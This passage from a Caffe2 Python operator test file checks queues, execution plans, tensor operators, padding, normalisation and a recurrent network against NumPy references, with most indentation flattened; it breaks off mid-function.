blobs = net1.SafeDequeueBlobs([queue], num_blobs + 1)
status = blobs[-1]
net2 = core.Net(name + '_counter')
counter = init_net.ConstantFill([], 1, value=0.0)
counters.append(counter)
net2.Add([counter, const_1], counter)
consumer_steps.append(core.execution_step(
name, [net1, net2], should_stop_blob=status))
consumer_step = core.execution_step(
'consumer', consumer_steps, concurrent_substeps=True)
init_step = core.execution_step('init', init_net)
worker_step = core.execution_step(
'worker', [consumer_step, producer_step], concurrent_substeps=True)
plan = core.Plan('test')
plan.AddStep(init_step)
plan.AddStep(worker_step)
self.ws.run(plan)
v = 0
for counter in counters:
v += self.ws.blobs[str(counter)].fetch().tolist()
self.assertEqual(v, truth)
@given(num_queues=st.integers(1, 5),
num_iter=st.integers(5, 10),
capacity=st.integers(1, 5),
num_blobs=st.integers(1, 3))
def test_weighted_sample_blobs_queue(
self, num_queues, num_iter, capacity, num_blobs
):
# Create BlobsQueue for each input queue
print("num_queues", num_queues)
init_net = core.Net('init_net')
queues = [
init_net.CreateBlobsQueue(
[], 1, capacity=capacity, num_blobs=num_blobs
) for _ in range(num_queues)
]
        # Create multiple producer nets and one producer exit net
producer_steps = []
producer_exit_nets = []
for i in range(num_queues):
name = 'producer_%d' % i
net = core.Net(name)
blobs = [net.ConstantFill([], 1, value=1.0, run_once=False)
for _ in range(num_blobs)]
status = net.NextName()
net.SafeEnqueueBlobs([queues[i]] + blobs, blobs + [status])
exit_net = core.Net('producer_exit_%d' % i)
exit_net.CloseBlobsQueue(queues[i], 0)
producer_exit_nets.append(exit_net)
step = core.execution_step(
name, [
core.execution_step(
'producer_%d' % i, [net], num_iter=num_iter
),
core.execution_step('producer_exit_%d' % i, [exit_net]),
]
)
producer_steps.append(step)
producer_step = core.execution_step(
'producer', [
core.execution_step(
'producers',
producer_steps,
concurrent_substeps=True,
),
]
)
status_lst = []
def append(ins, outs):
status_lst.append(ins)
        # Create one consumer dequeue net and one consumer exit net
consumer_net = core.Net('weight_sample_dequeue_net')
table_idx_blob = np.random.randint(low=-1, high=num_blobs, size=1)
blobs = consumer_net.WeightedSampleDequeueBlobs(
queues,
num_blobs + 1,
weights=np.random.uniform(low=0.0, high=1.0, size=(num_queues,)),
table_idx_blob=table_idx_blob[0],
)
status = blobs[-1]
consumer_net.Python(append)(status)
consumer_step = core.execution_step(
'consumer',
[
core.execution_step(
'consumer', [consumer_net], should_stop_blob=status
),
core.execution_step('producer_exit', producer_exit_nets)
]
)
init_step = core.execution_step('init', init_net)
worker_step = core.execution_step(
'worker', [producer_step, consumer_step], concurrent_substeps=True)
plan = core.Plan('test')
plan.AddStep(init_step)
plan.AddStep(worker_step)
self.ws.run(plan)
assert len(status_lst) >= num_iter + 1
assert len(status_lst) <= num_iter * num_queues + 1
@given(
data=hu.tensor(),
**hu.gcs_cpu_only)
def test_squeeze_expand_dims(self, data, gc, dc):
dims = [0, 0]
if len(data.shape) > 2:
dims.append(2)
op = core.CreateOperator(
"ExpandDims",
["data"],
["expanded"],
dims=dims)
def expand_dims_ref(data, *args, **kw):
inc_dims = list(set(dims))
inc_dims.sort()
r = data
for dim in inc_dims:
r = np.expand_dims(r, axis=dim)
return (r, )
def squeeze_ref(data, *args, **kw):
dec_dims = list(set(dims))
dec_dims.sort(reverse=True)
r = data
for dim in dec_dims:
r = np.squeeze(r, axis=dim)
return (r, )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[data],
reference=expand_dims_ref,
output_to_grad='expanded',
grad_reference=squeeze_ref)
@given(**hu.gcs_cpu_only)
def test_tt_layer(self, gc, dc):
seed = 1234
np.random.seed(seed)
inp_sizes = [2, 2, 2, 2]
out_sizes = [2, 2, 2, 2]
tt_ranks = [1, 3, 3, 3, 1]
op = core.CreateOperator(
"TT",
["X", "b", "cores"],
["Y"],
inp_sizes=inp_sizes,
out_sizes=out_sizes,
tt_ranks=tt_ranks,
)
X = np.expand_dims(
np.random.rand(16).astype(np.float32), axis=0)
b = np.array([0] * 16).astype(np.float32)
cores = tt_core.init_tt_cores(inp_sizes, out_sizes, tt_ranks)
self.ws.create_blob("X").feed(X)
self.ws.create_blob("b").feed(b)
self.ws.create_blob("cores").feed(cores)
self.ws.run(op)
Y = self.ws.blobs[("Y")].fetch()
Y = Y.reshape([16])
golden = np.array([-9.51763490e-07, -1.28442286e-06,
-2.86281141e-07, 2.28865644e-07,
-1.96180017e-06, -1.78920531e-06,
9.31094666e-07, -2.04273989e-07,
1.70017107e-06, 1.64845711e-06,
-1.06099132e-06, -4.69111137e-07,
6.57552358e-08, -1.28942040e-08,
-2.29114004e-07, -1.04262714e-06])
# This golden array is dependent on the specified inp_sizes, out_sizes,
# tt_ranks, and seed. Changing these will cause the test to fail.
self.assertAlmostEqual(np.linalg.norm(golden - Y), 0, delta=1e-10)
@given(num_workers=st.integers(1, 10),
net_type=st.sampled_from(
["simple", "dag"] +
(["async_dag"] if workspace.has_gpu_support else [])),
# This test is flaky on rocm caused by race condition in
# hcc HSAQueue, the fix will be coming in rocm 2.2 (see
# https://github.com/pytorch/pytorch/issues/16229
**hu.gcs_no_hip)
def test_dag_net_forking(self, net_type, num_workers, gc, dc):
from caffe2.python.model_helper import ModelHelper
from caffe2.python import brew
m = ModelHelper(name="test_model")
n = 10
d = 2
depth = 2
iters = 5
np.random.seed(1701)
# Build a binary tree of FC layers, summing at each node.
for i in reversed(range(depth)):
for j in range(2 ** i):
bottom_1 = "{}_{}".format(i + 1, 2 * j)
bottom_2 = "{}_{}".format(i + 1, 2 * j + 1)
mid_1 = "{}_{}_m".format(i + 1, 2 * j)
mid_2 = "{}_{}_m".format(i + 1, 2 * j + 1)
top = "{}_{}".format(i, j)
brew.fc(
m,
bottom_1, mid_1,
dim_in=d, dim_out=d,
weight_init=('ConstantFill', dict(value=np.random.randn())),
bias_init=('ConstantFill', dict(value=np.random.randn())))
brew.fc(
m,
bottom_2, mid_2,
dim_in=d, dim_out=d,
weight_init=('ConstantFill', dict(value=np.random.randn())),
bias_init=('ConstantFill', dict(value=np.random.randn())))
m.net.Sum([mid_1, mid_2], top)
m.net.SquaredL2Distance(["0_0", "label"], "xent")
m.net.AveragedLoss("xent", "loss")
input_to_grad = m.AddGradientOperators(["loss"])
m.Proto().device_option.CopyFrom(gc)
m.param_init_net.Proto().device_option.CopyFrom(gc)
m.Proto().type = net_type
m.Proto().num_workers = num_workers
self.ws.run(m.param_init_net)
print(str(m.Proto()))
def run():
import numpy as np
np.random.seed(1701)
input_blobs = ["{}_{}".format(depth, j) for j in range(2 ** depth)]
for input_blob in input_blobs:
self.ws.create_blob(input_blob).feed(
np.random.randn(n, d).astype(np.float32),
device_option=gc)
self.ws.create_blob("label").feed(
np.random.randn(n, d).astype(np.float32),
device_option=gc)
self.ws.run(m.net)
gradients = [
self.ws.blobs[str(input_to_grad[input_blob])].fetch()
for input_blob in input_blobs]
return gradients
outputs = [run() for _ in range(iters)]
for output in outputs[1:]:
np.testing.assert_array_equal(outputs[0], output)
self.assertAlmostEqual(np.sum(np.square(output)), 91.81752,
delta=1e-2)
@given(input=hu.tensor(min_dim=2, max_dim=6, dtype=np.int32,
elements=st.integers(min_value=0,
max_value=2**32 - 1)),
slice_dim=st.integers(),
a=st.integers(),
b=st.integers(),
is_empty=st.booleans(),
**hu.gcs_cpu_only)
def test_slice(self, input, slice_dim, a, b, is_empty, gc, dc):
slice_dim = slice_dim % len(input.shape)
        if is_empty:
input = np.random.rand(*([0] + list(input.shape))).astype(np.int32)
slice_dim += 1
a = a % input.shape[slice_dim]
b = b % input.shape[slice_dim] + 1
start_vec = np.zeros(len(input.shape), dtype=np.int32)
end_vec = np.ones(len(input.shape), dtype=np.int32) * -1
start_vec[slice_dim] = min(a, b)
end_vec[slice_dim] = max(a, b)
op = core.CreateOperator(
"Slice",
["input", "start", "end"],
["output"])
def slice_ref(x, s, e):
if len(s.shape) == 0:
return x
slc = [slice(si, None if ei == -1 else ei) for si, ei in zip(s, e)]
return (x[slc], )
self.assertReferenceChecks(gc, op, [input, start_vec, end_vec],
slice_ref)
@given(data=hu.tensor(), **hu.gcs_cpu_only)
def test_shape(self, data, gc, dc):
op = core.CreateOperator("Shape", ["data"], ["shape"])
self.assertReferenceChecks(gc, op, [data], lambda x: (x.shape, ))
@given(data=hu.tensor(), **hu.gcs_cpu_only)
def test_shape_with_axes(self, data, gc, dc):
def shape_ref(x, y):
return ([x.shape[i] for i in y],)
axes = np.random.randint(len(data.shape), size=10).tolist()
op = core.CreateOperator("Shape", ["data"], ["shape"], axes=axes)
self.assertReferenceChecks(gc, op, [data, axes], shape_ref)
@given(data=hu.tensor(), **hu.gcs_cpu_only)
def test_has_elements(self, data, gc, dc):
op = core.CreateOperator("HasElements", ["data"], ["has_elements"])
self.assertReferenceChecks(gc, op, [data], lambda x: (len(x) > 0, ))
op = core.CreateOperator("IsEmpty", ["data"], ["is_empty"])
self.assertReferenceChecks(gc, op, [data], lambda x: (len(x) == 0, ))
@given(initial_iters=st.integers(0, 100),
max_iters=st.integers(0, 100))
def test_should_stop_as_criteria_net_execution_step(
self, initial_iters, max_iters):
net = core.Net("net")
net.Iter(["iter"], ["iter"])
self.ws.create_blob("iter").feed(
np.asarray([initial_iters]).astype(np.int64))
self.ws.create_blob("num_iters").feed(
np.asarray([max_iters]).astype(np.int64))
criteria_net = core.Net("criteria")
criteria_net.GE(["iter", "num_iters"], ["stop"])
criteria_net.Proto().external_output.extend(["stop"])
plan = core.Plan('plan')
plan.AddStep(core.execution_step(
'step', [criteria_net, net],
should_stop_blob=core.BlobReference("stop")))
self.ws.run(plan)
iters = self.ws.blobs[("iter")].fetch()
self.assertEqual(iters.dtype, np.int64)
self.assertEqual(iters[0], max(initial_iters, max_iters))
def test_disabled_execution_step(self):
def createNets(i, disabled):
should_stop = 'should_stop_{}'.format(i)
output = 'output_{}'.format(i)
# init content and stop signal
init = core.Net("init_{}".format(i))
init.ConstantFill(
[],
[output],
shape=[1],
value=0.0
)
init.Cast([output], [should_stop], to='bool')
# decide if disabled or not
criterion = core.Net("criterion_{}".format(i))
tmp = criterion.ConstantFill(
[],
shape=[1],
value=1.0 if disabled else 0.0
)
criterion.Cast([tmp], [should_stop], to='bool')
criterion.Proto().external_output.extend([should_stop])
# the body net is just to turn a 0 blob to 1
net = core.Net("net_{}".format(i))
net.ConstantFill(
[],
[output],
shape=[1],
value=1.0
)
# always end the loop
ender = core.Net("ender_{}".format(i))
tmp = ender.ConstantFill(
[],
shape=[1],
value=1.0
)
ender.Cast([tmp], [should_stop], to='bool')
ender.Proto().external_output.extend([should_stop])
return [init, criterion, net, ender]
nets = [createNets(1, False),
createNets(2, True),
createNets(3, False)]
steps = [
core.execution_step(
'step_1', nets[0],
should_stop_blob=core.BlobReference('should_stop_1')),
core.execution_step(
'step_2', nets[1],
should_stop_blob=core.BlobReference('should_stop_2')),
core.execution_step('step_3', nets[2])
]
expected = [1.0, 0.0, 1.0]
plan = core.Plan('plan')
plan.AddStep(core.execution_step('all_steps', steps, num_iter=3))
self.ws.run(plan)
for i, _ in enumerate(nets):
self.assertEqual(
self.ws.blobs['output_{}'.format(i + 1)].fetch()[0],
expected[i])
@given(initial_iters=st.integers(0, 100),
num_iters=st.integers(0, 100))
def test_iter_count_with_execution_step(self, initial_iters, num_iters):
net = core.Net("net")
net.Iter(["iter"], ["iter"])
self.ws.create_blob("iter").feed(
np.asarray([initial_iters]).astype(np.int64))
step = core.ExecutionStep("step", [net])
step.SetIter(num_iters)
plan = core.Plan("plan")
plan.AddStep(step)
self.ws.run(plan)
iters = self.ws.blobs[("iter")].fetch()
self.assertEqual(iters.dtype, np.int64)
self.assertEqual(iters[0], initial_iters + num_iters)
@given(initial_iters=st.integers(0, 100),
num_iters=st.integers(0, 100),
num_nets=st.integers(0, 5))
def test_atomic_iter_with_concurrent_steps(self, initial_iters, num_iters,
num_nets):
init_net = core.Net("init_net")
iter_mutex = init_net.CreateMutex([], ["iter_mutex"])
self.ws.create_blob("iter").feed(
np.asarray([initial_iters]).astype(np.int64))
concurrent_steps = core.ExecutionStep("concurrent_steps",
num_iter=num_iters)
for i in range(num_nets):
net = core.Net("net_{}".format(i))
net.AtomicIter([iter_mutex, "iter"], ["iter"])
step = core.ExecutionStep("step", [net])
concurrent_steps.AddSubstep(step)
concurrent_steps.SetConcurrentSubsteps(True)
plan = core.Plan("plan")
plan.AddStep(concurrent_steps)
stats_net = core.Net("stats_net")
stats_net.StatRegistryExport([], ["stats_key", "stats_val", "stats_ts"])
self.ws.run(init_net)
self.ws.run(plan)
self.ws.run(stats_net)
iters = self.ws.blobs[("iter")].fetch()
self.assertEqual(iters.dtype, np.int64)
self.assertEqual(iters[0], initial_iters + num_iters * num_nets)
if num_iters * num_nets > 0:
stats_key = self.ws.blobs[("stats_key")].fetch()
atomic_iter_key = b'atomic_iter/stats/iter/num_iter'
self.assertTrue(atomic_iter_key in stats_key)
stat_val = self.ws.blobs[("stats_val")].fetch()
self.assertEqual(num_iters * num_nets, stat_val[list(stats_key).index(atomic_iter_key)])
@given(a=hu.tensor(),
src=st.sampled_from(list(viewkeys(_NUMPY_TYPE_TO_ENUM))),
dst=st.sampled_from(list(viewkeys(_NUMPY_TYPE_TO_ENUM))),
use_name=st.booleans(),
**hu.gcs)
def test_cast(self, a, src, dst, use_name, gc, dc):
a = a.astype(src)
# Casting from a float type outside the range of the integral
# type is UB.
ftypes = [np.float32, np.float64]
if src in ftypes and dst not in ftypes and dst is not np.bool:
info = np.iinfo(dst)
a = np.clip(a, info.min, info.max)
def ref(data):
return [data.astype(dst)]
to = _NUMPY_TYPE_TO_ENUM[dst]
if use_name:
to = caffe2_pb2.TensorProto.DataType.Name(to).lower()
op = core.CreateOperator('Cast', ["X"], ["Y"], to=to)
self.assertDeviceChecks(dc, op, [a], [0])
out, = self.assertReferenceChecks(gc, op, [a], ref)
self.assertEqual(dst, out.dtype)
@given(a=hu.tensor(),
eps=st.floats(min_value=1e-4, max_value=1e-2),
a_grad=hu.tensor(elements=st.floats(min_value=0.01, max_value=0.99)),
eps_grad=st.floats(min_value=1e-4, max_value=1e-3),
**hu.gcs)
def test_logit(self, a, eps, a_grad, eps_grad, gc, dc):
def ref(data):
data = np.clip(data, eps, 1.0 - eps)
return (np.log(data / (1 - data)), )
        # Forward testing is carried out over the full range of input
        # to preserve the original test coverage.
        # The gradient test uses a reduced input range because of the
        # sharp increase of the logit curve at 0 and 1: the numerical
        # error increases dramatically when the input is close to 0 or 1
        # and would fail the test, so the gradient test only runs in the
        # range (0.01, 0.99). Very occasionally the test may still fail
        # due to accumulated random error; reducing the range to
        # (0.02, 0.98) would further improve stability.
op = core.CreateOperator('Logit', ["X"], ["Y"], eps=eps)
self.assertDeviceChecks(dc, op, [a], [0])
self.assertReferenceChecks(gc, op, [a], ref)
op_grad = core.CreateOperator('Logit', ["X"], ["Y"], eps=eps_grad)
self.assertGradientChecks(gc, op_grad, [a_grad], 0, [0],
threshold=0.04, stepsize=2e-3)
@given(a=hu.tensor(elements=st.floats(allow_nan=True)),
value=st.floats(min_value=-10, max_value=10),
**hu.gcs)
def test_replace_nan(self, a, value, gc, dc):
def ref(data):
out = np.copy(data)
out[np.isnan(data)] = value
return (out, )
op = core.CreateOperator('ReplaceNaN', ["X"], ["Y"], value=value)
self.assertDeviceChecks(dc, op, [a], [0])
self.assertReferenceChecks(gc, op, [a], ref)
@given(data=_dtypes(dtypes=[np.int32, np.int64, np.float32, np.bool]).
flatmap(lambda dtype: hu.tensor(
min_dim=1, dtype=dtype, elements=hu.elements_of_type(dtype))),
has_input=st.booleans(),
has_extra_shape=st.booleans(),
extra_shape=st.lists(
min_size=1, max_size=5, elements=st.integers(1, 5)),
**hu.gcs)
def test_constant_fill(self, data, has_input, has_extra_shape, extra_shape,
gc, dc):
dtype = data.dtype.type
# in opt mode, np.bool is converted into np.bool_
if data.dtype == np.dtype(np.bool):
dtype = np.bool
value = data.item(0)
gt_shape = data.shape
inputs = [data]
enum_type = _NUMPY_TYPE_TO_ENUM[dtype]
if has_input:
if has_extra_shape:
op = core.CreateOperator('ConstantFill', ["X"], ["Y"],
dtype=enum_type,
extra_shape=extra_shape,
value=value)
gt_shape += tuple(extra_shape)
else:
op = core.CreateOperator('ConstantFill', ["X"], ["Y"],
dtype=enum_type,
value=value)
else:
op = core.CreateOperator('ConstantFill', [], ["Y"],
dtype=enum_type,
value=value,
shape=list(gt_shape))
inputs = []
def ref(inputs=None):
outputs = np.full(shape=gt_shape, fill_value=value, dtype=dtype)
return [outputs]
self.assertDeviceChecks(dc, op, inputs, [0])
out, = self.assertReferenceChecks(gc, op, inputs, ref)
self.assertEqual(dtype, out.dtype)
@given(t=st.integers(1, 5),
n=st.integers(1, 5),
d=st.integers(1, 5))
def test_elman_recurrent_network(self, t, n, d):
from caffe2.python import model_helper, brew
np.random.seed(1701)
step_net = model_helper.ModelHelper(name="Elman")
# TODO: name scope external inputs and outputs
step_net.Proto().external_input.extend(
["input_t", "seq_lengths", "timestep",
"hidden_t_prev", "gates_t_w", "gates_t_b"])
step_net.Proto().type = "simple"
step_net.Proto().external_output.extend(["hidden_t", "gates_t"])
brew.fc(step_net,
"hidden_t_prev", "gates_t", dim_in=d, dim_out=d, axis=2)
step_net.net.Sum(["gates_t", "input_t"], ["gates_t"])
step_net.net.Sigmoid(["gates_t"], ["hidden_t"])
# Initialize params for step net in the parent net
for op in step_net.param_init_net.Proto().op:
workspace.RunOperatorOnce(op)
backward_ops, backward_mapping = core.GradientRegistry.GetBackwardPass(
step_net.Proto().op, {"hidden_t": "hidden_t_grad"})
backward_mapping = {
str(k): str(v) for k, v in viewitems(backward_mapping)
}
backward_step_net = core.Net("ElmanBackward")
del backward_step_net.Proto().op[:]
backward_step_net.Proto().op.extend(backward_ops)
assert backward_mapping["input_t"] == "gates_t_grad"
links = [
("hidden_t_prev", "hidden", 0),
("hidden_t", "hidden", 1),
("input_t", "input", 0),
]
link_internal, link_external, link_offset = zip(*links)
backward_links = [
("hidden_t_prev_grad", "hidden_grad", 0),
("hidden_t_grad", "hidden_grad", 1),
("gates_t_grad", "input_grad", 0),
]
backward_link_internal, backward_link_external, backward_link_offset = \
zip(*backward_links)
backward_step_net.Proto().external_input.extend(["hidden_t_grad"])
backward_step_net.Proto().external_input.extend(
step_net.Proto().external_input)
backward_step_net.Proto().external_input.extend(
step_net.Proto().external_output)
inputs = ["input", "seq_lengths", "gates_t_w", "gates_t_b", "hidden_input"]
recurrent_inputs = ["hidden_input"]
op = core.CreateOperator(
"RecurrentNetwork",
inputs,
["output", "hidden", "hidden_output", "step_workspaces"],
alias_src=["hidden", "hidden"],
alias_dst=["output", "hidden_output"],
alias_offset=[1, -1],
recurrent_states=["hidden"],
initial_recurrent_state_ids=[
inputs.index(i) for i in recurrent_inputs
],
link_internal=link_internal,
link_external=link_external,
link_offset=link_offset,
backward_link_internal=backward_link_internal,
backward_link_external=backward_link_external,
backward_link_offset=backward_link_offset,
param=[inputs.index(p) for p in step_net.params],
step_net=step_net.Proto(),
backward_step_net=backward_step_net.Proto(),
outputs_with_grads=[0],
)
workspace.FeedBlob(
"input", np.random.randn(t, n, d).astype(np.float32))
workspace.FeedBlob(
"hidden_input", np.random.randn(1, n, d).astype(np.float32))
workspace.FeedBlob(
"seq_lengths", np.random.randint(0, t, size=(n,)).astype(np.int32))
def reference(input, seq_lengths, gates_w, gates_b, hidden_input):
T = input.shape[0]
N = input.shape[1]
D = input.shape[2]
hidden = np.zeros(shape=(T + 1, N, D))
assert hidden.shape[0] == T + 1
assert hidden.shape[1] == N
assert hidden.shape[2] == D
hidden[0, :, :] = hidden_input
for t in range(T):
input_t = input[t].reshape(1, N, D)
hidden_t_prev = hidden[t].reshape(1, N, D)
gates = np.dot(hidden_t_prev, gates_w.T)
gates = gates.reshape(1, N, D) + input_t.reshape(1, N, D)
hidden[t + 1] = sigmoid(gates)
return hidden[1:], hidden, hidden[-1].reshape(1, N, D)
self.assertReferenceChecks(
hu.cpu_do,
op,
[workspace.FetchBlob(name)
for name in ["input", "seq_lengths", "gates_t_w", "gates_t_b",
"hidden_input"]],
reference,
outputs_to_check=[0, 1, 2])
for param in [0, 2, 3]:
self.assertGradientChecks(
hu.cpu_do,
op,
[workspace.FetchBlob(name)
for name in ["input", "seq_lengths", "gates_t_w", "gates_t_b",
"hidden_input"]],
param,
[0])
@settings(suppress_health_check=[HealthCheck.filter_too_much])
@given(n=st.integers(1, 5),
c=st.integers(1, 5),
h=st.integers(1, 5),
w=st.integers(1, 5),
pad=st.integers(0, 2),
block_size=st.integers(2, 3),
**hu.gcs)
def test_space_to_batch(self, n, c, h, w, pad, block_size, gc, dc):
assume((h + 2 * pad) % block_size == 0)
assume((w + 2 * pad) % block_size == 0)
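        # SpaceToBatch with pad p and block size b maps (n, c, h, w) to
        # (n * b * b, c, (h + 2p) / b, (w + 2p) / b); BatchToSpace in the
        # next test inverts this mapping.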
X = np.random.randn(n, c, h, w).astype(np.float32)
op = core.CreateOperator("SpaceToBatch", ["X"], ["Y"],
pad=pad, block_size=block_size)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@settings(suppress_health_check=[HealthCheck.filter_too_much])
@given(n=st.integers(1, 5),
c=st.integers(1, 5),
h=st.integers(1, 5),
w=st.integers(1, 5),
pad=st.integers(0, 2),
block_size=st.integers(2, 3),
**hu.gcs)
def test_batch_to_space(self, n, c, h, w, pad, block_size, gc, dc):
assume((h + 2 * pad) % block_size == 0)
assume((w + 2 * pad) % block_size == 0)
X = np.random.randn(
n * block_size * block_size,
c,
(h + 2 * pad) // block_size,
(w + 2 * pad) // block_size).astype(np.float32)
op = core.CreateOperator("BatchToSpace", ["X"], ["Y"],
pad=pad, block_size=block_size)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(),
in_place=st.booleans(),
scale=st.floats(min_value=-2.0, max_value=2.0),
**hu.gcs)
def test_scale(self, X, in_place, scale, gc, dc):
op = core.CreateOperator(
"Scale", ["X"], ["Y" if not in_place else "X"],
scale=scale)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(s=st.text())
def test_string_serde(self, s):
s = s.encode('ascii', 'ignore')
self.ws.create_blob("a").feed(s)
serialized = self.ws.blobs["a"].serialize("a")
self.ws.create_blob("b").deserialize(serialized)
self.assertEqual(s, self.ws.blobs[("a")].fetch())
self.assertEqual(s, self.ws.blobs[("b")].fetch())
@given(pad=st.integers(0, 3),
size=st.integers(1, 10),
input_channels=st.integers(1, 5),
batch_size=st.integers(1, 5),
order=st.sampled_from(["NCHW", "NHWC"]),
mode=st.sampled_from(["constant", "reflect", "edge"]),
**hu.gcs)
def test_same_pad_image(self, pad, size, input_channels, batch_size, order,
mode, gc, dc):
assume(size > pad)
op = core.CreateOperator(
"PadImage",
["X"],
["Y"],
pad=pad,
mode=mode,
order=order,
)
if order == "NHWC":
X = np.random.rand(
batch_size, size, size, input_channels).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (pad, pad), (pad, pad), (0, 0)), mode),)
else:
X = np.random.rand(
batch_size, input_channels, size, size).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode),)
self.assertReferenceChecks(gc, op, [X], numpy_pad_ref)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(pad_t=st.integers(0, 3),
pad_l=st.integers(0, 3),
pad_b=st.integers(0, 3),
pad_r=st.integers(0, 3),
size=st.integers(1, 10),
input_channels=st.integers(1, 5),
batch_size=st.integers(1, 5),
order=st.sampled_from(["NCHW", "NHWC"]),
mode=st.sampled_from(["constant", "reflect", "edge"]),
**hu.gcs)
def test_pad_image(self, pad_t, pad_l, pad_b, pad_r, size, input_channels,
batch_size, order, mode, gc, dc):
assume(size > max(pad_b, pad_r, pad_t, pad_l))
op = core.CreateOperator(
"PadImage",
["X"],
["Y"],
pad_t=pad_t,
pad_l=pad_l,
pad_b=pad_b,
pad_r=pad_r,
mode=mode,
order=order,
)
if order == "NHWC":
X = np.random.rand(
batch_size, size, size, input_channels).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (pad_t, pad_b), (pad_l, pad_r), (0, 0)),
mode),)
else:
X = np.random.rand(
batch_size, input_channels, size, size).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (0, 0), (pad_t, pad_b), (pad_l, pad_r)),
mode),)
self.assertReferenceChecks(gc, op, [X], numpy_pad_ref)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(size=st.integers(7, 10),
input_channels=st.integers(1, 10),
batch_size=st.integers(1, 3),
order=st.sampled_from(["NCHW", "NHWC"]),
epsilon=st.floats(min_value=1e-4, max_value=1e-2),
**hu.gcs_cpu_only)
def test_instance_norm(self, size, input_channels, batch_size, order,
epsilon, gc, dc):
op = core.CreateOperator(
"InstanceNorm",
["X", "scale", "bias"],
["Y"],
order=order,
epsilon=epsilon,
)
np.random.seed(1701)
scale = np.random.rand(input_channels).astype(np.float32) + 0.5
bias = np.random.rand(input_channels).astype(np.float32) - 0.5
X = np.random.rand(
batch_size, input_channels, size, size).astype(np.float32) - 0.5
if order == "NHWC":
X = X.swapaxes(1, 2).swapaxes(2, 3)
def ref_nchw(x, scale, bias):
x = x.reshape(batch_size * input_channels, size * size)
y = (x - x.mean(1)[:, np.newaxis])
y /= np.sqrt(x.var(1) + epsilon)[:, np.newaxis]
y = y.reshape(batch_size, input_channels, size, size)
y = y * scale.reshape(1, input_channels, 1, 1)
y = y + bias.reshape(1, input_channels, 1, 1)
return (y, )
def ref_nhwc(x, scale, bias):
x = x.swapaxes(2, 3).swapaxes(1, 2)
y = ref_nchw(x, scale, bias)[0]
return (y.swapaxes(1, 2).swapaxes(2, 3), )
self.assertReferenceChecks(
gc, op, [X, scale, bias],
ref_nchw if order == "NCHW" else ref_nhwc)
# TODO(jiayq): when there are backward and GPU implementations, enable
# these two.
# self.assertDeviceChecks(dc, op, [X, scale, bias], [0])
# self.assertGradientChecks(gc, op, [X, scale, bias], 0, [0])
ws = workspace.C.Workspace()
feeds = [("X", X), ("scale", scale), ("bias", bias)]
for blob, arr in feeds:
ws.create_blob(blob).feed(arr)
for _ in range(100):
ws.run(op)
for blob, arr in feeds:
np.testing.assert_array_equal(ws.blobs[blob].fetch(), arr)
@given(inp=_dtypes().flatmap(lambda dt: _tensor_and_indices(
elements=st.floats(min_value=0, max_value=1), dtype=dt)),
**hu.gcs)
def test_sparse_to_dense(self, inp, gc, dc):
first_dim, X, I = inp
        if X.dtype != np.dtype('float32') and gc.device_type in {caffe2_pb2.CUDA, caffe2_pb2.HIP}:
            # CUDA only supports 32-bit float
print("Bailout {}".format(X.dtype))
return
        if gc.device_type in {caffe2_pb2.CUDA, caffe2_pb2.HIP}:
            # The CUDA version only supports int32 indices
I = I.astype(np.int32)
# values don't matter
D = np.zeros((first_dim,) + X.shape[1:]).astype(X.dtype)
op = core.CreateOperator("SparseToDense", ["I", "X", "D"], ["Y"])
def sparse_to_dense(I, X, D):
O = np.zeros(D.shape)
for i, p in enumerate(I):
O[p] += X[i]
return [O]
self.assertReferenceChecks(gc, op, [I, X, D], sparse_to_dense)
X = X.astype(np.float32)
self.assertGradientChecks(gc, op, [I, X, D], 1, [0])
@given(inputs=hu.tensors(n=2, min_dim=2, max_dim=2), **hu.gcs_cpu_only)
def test_dot_product(self, inputs, gc, dc):
X, Y = inputs
op = core.CreateOperator("DotProduct", ["X", "Y"], 'out')
def dotproduct(X, Y):
return (np.sum(X * Y, axis=1), )
self.assertReferenceChecks(gc, op, [X, Y], dotproduct)
self.assertDeviceChecks(dc, op, [X, Y], [0])
self.assertGradientChecks(gc, op, [X, Y], 0, [0])
self.assertGradientChecks(gc, op, [X, Y], 1, [0])
@given(N=st.integers(min_value=2, max_value=10),
M=st.integers(min_value=2, max_value=10),
K=st.integers(min_value=2, max_value=10),
pad_value=st.floats(min_value=0.1, max_value=1.0),
**hu.gcs_cpu_only)
def test_dot_product_with_padding(self, N, M, K, pad_value, gc, dc):
X = np.random.rand(N, M).astype(np.float32) - 0.5
Y = np.random.rand(N, K).astype(np.float32) - 0.5
op = core.CreateOperator("DotProductWithPadding", ["X", "Y"], 'out',
pad_value=pad_value)
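        # The narrower of X and Y is padded with pad_value up to the wider
        # width before taking row-wise dot products.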
def dotproduct(X, Y):
Z = np.ones((N, max(M, K))).astype(np.float32) * pad_value
if M < K:
Z[:, :M] = X
return (np.sum(Z * Y, axis=1), )
else:
Z[:, :K] = Y
return (np.sum(Z * X, axis=1), )
self.assertReferenceChecks(gc, op, [X, Y], dotproduct)
self.assertDeviceChecks(dc, op, [X, Y], [0])
self.assertGradientChecks(gc, op, [X, Y], 0, [0])
self.assertGradientChecks(gc, op, [X, Y], 1, [0])
@given(N=st.integers(min_value=2, max_value=10),
M=st.integers(min_value=2, max_value=10),
pad_value=st.floats(min_value=0.1, max_value=1.0),
**hu.gcs_cpu_only)
def test_dot_product_with_rep_padding(self, N, M, pad_value, gc, dc):
K = 2 * M
X = np.random.rand(N, M).astype(np.float32) - 0.5
Y = np.random.rand(N, K).astype(np.float32) - 0.5
op = core.CreateOperator("DotProductWithPadding", ["X", "Y"], 'out',
replicate=True,
pad_value=pad_value)
def dotproduct(X, Y):
import numpy.matlib as npm
if M < K:
Z = npm.repmat(X, 1, K // M)
return (np.sum(Z * Y, axis=1), )
